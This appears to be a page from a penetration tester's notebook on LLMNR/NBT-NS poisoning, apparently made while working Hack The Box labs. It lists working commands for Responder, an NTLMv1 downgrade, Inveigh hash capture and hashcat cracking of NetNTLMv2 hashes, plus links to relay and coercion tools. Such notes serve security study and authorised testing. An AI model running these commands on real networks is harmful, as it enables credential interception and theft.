LLMNR NBT-NS Poisoning

Responder

sudo responder -I ens224 
hashcat -m 5600 forend_ntlmv2 /usr/share/wordlists/rockyou.txt
Hashes

Downgrade Attack

Responder.py -I eth0 -v --lm --disable-ess
LogoNTLMv1 DowngradePentester's Promiscuous Notebook

NetNTLMv1 obtained - Convert the hash to NTLM - See Crack Hash

Inveigh

LogoGitHub - Kevin-Robertson/Inveigh: .NET IPv4/IPv6 machine-in-the-middle tool for penetration testersGitHub
PS C:\htb> Import-Module .\Inveigh.ps1
PS C:\htb> Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y
Invoke-Inveigh -IP '10.13.38.16' –NBNS Y –mDNS Y –Proxy Y -FileOutput Y -FileOutputDirectory 'c:\users\username\documents' -LogOutput Y
LogoBasics · Kevin-Robertson/Inveigh WikiGitHub

C# version

PS C:\htb> .\Inveigh.exe

Press ESC to enter/exit interactive console

GET NTLMV2UNIQUE
GET NTLMV2USERNAMES

NTLM Relay

SMB (445, 139) / RPC
LogoRelai NTLMhackndo

Coercer

LogoGitHub - p0dalirius/Coercer: A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through 9 methods.GitHub

More Tools: SMB

PreviousNetwork AttacksNextADIDNS Spoofing

Last updated